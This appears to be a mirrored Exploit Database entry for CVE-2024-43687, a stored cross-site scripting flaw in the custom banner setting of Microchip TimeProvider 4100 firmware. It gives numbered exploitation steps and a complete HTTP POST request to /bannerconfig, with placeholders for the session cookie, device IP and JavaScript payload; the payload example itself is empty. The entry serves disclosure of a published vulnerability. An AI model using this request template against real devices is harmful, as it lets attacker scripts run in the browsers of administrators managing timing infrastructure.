Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 – Stored Cross-Site Scripting (XSS)

Exploit Database
25 阅读

作者： Armando Huesca Prida

日期： 2025-04-04
类别：
- remote
平台：
- hardware
来源：https://www.exploit-db.com/exploits/52120/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

# Exploit Title: Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)

# Exploit Author: Armando Huesca Prida

# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

# Date of Disclosure: 27/06/2024

# Date of CVE Publication: 4/10/2024

# Exploit Publication: 10/10/2024

# Vendor Homepage: https://www.microchip.com/

# Version: Firmware release 1.0 through 2.4.7

# Tested on: Firmware release 2.3.12

# CVE: CVE-2024-43687

# External References:

# URL: https://www.cve.org/cverecord?id=CVE-2024-43687

# URL: https://www.0xhuesca.com/2024/10/cve-2024-43687.html

# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner

# URL: https://www.gruppotim.it/it/footer/red-team.html

# Vulnerability Description:

The TimeProvider 4100 grandmaster firmware has a stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. A threat actor that exploits this vulnerability is able to execute arbitrary scripts in any user context.

# Exploitation Steps:

1- Log in to the device's web management interface.

2- Open the banner configuration panel.

3- Select the "custom banner" feature.

4- Insert the malicious JavaScript payload.

5- Apply and save the system configuration containing the custom banner.

6- Victims who connect to the device's web management interface will execute the malicious payload in their browser.

# Example of malicious JavaScript payload:

# Proof of Concept - PoC:

By manually modifying the following request, it is possible to create a new custom device banner containing a malicious JavaScript payload, resulting in a stored XSS vulnerability. The list of values that must be updated in the exploit HTTP request is given below:

- [session cookie]

- [malicious JavaScript payload]

- [device IP]

# Exploit - HTTP Request:

POST /bannerconfig HTTP/1.1

Host: [device IP]

Cookie: ci_session=[session cookie]

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502

Content-Length: 673

Origin: https://[device IP]

Referer: https://[device IP]/bannerconfig

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

Te: trailers

Connection: keep-alive

-----------------------------9680247575877256312575038502

Content-Disposition: form-data; name="user_level"

-----------------------------9680247575877256312575038502

Content-Disposition: form-data; name="bannerradio"

CUSTOMIZED

-----------------------------9680247575877256312575038502

Content-Disposition: form-data; name="txtcustom"

[malicious JavaScript payload]

-----------------------------9680247575877256312575038502

Content-Disposition: form-data; name="action"

applybanner

-----------------------------9680247575877256312575038502--

# End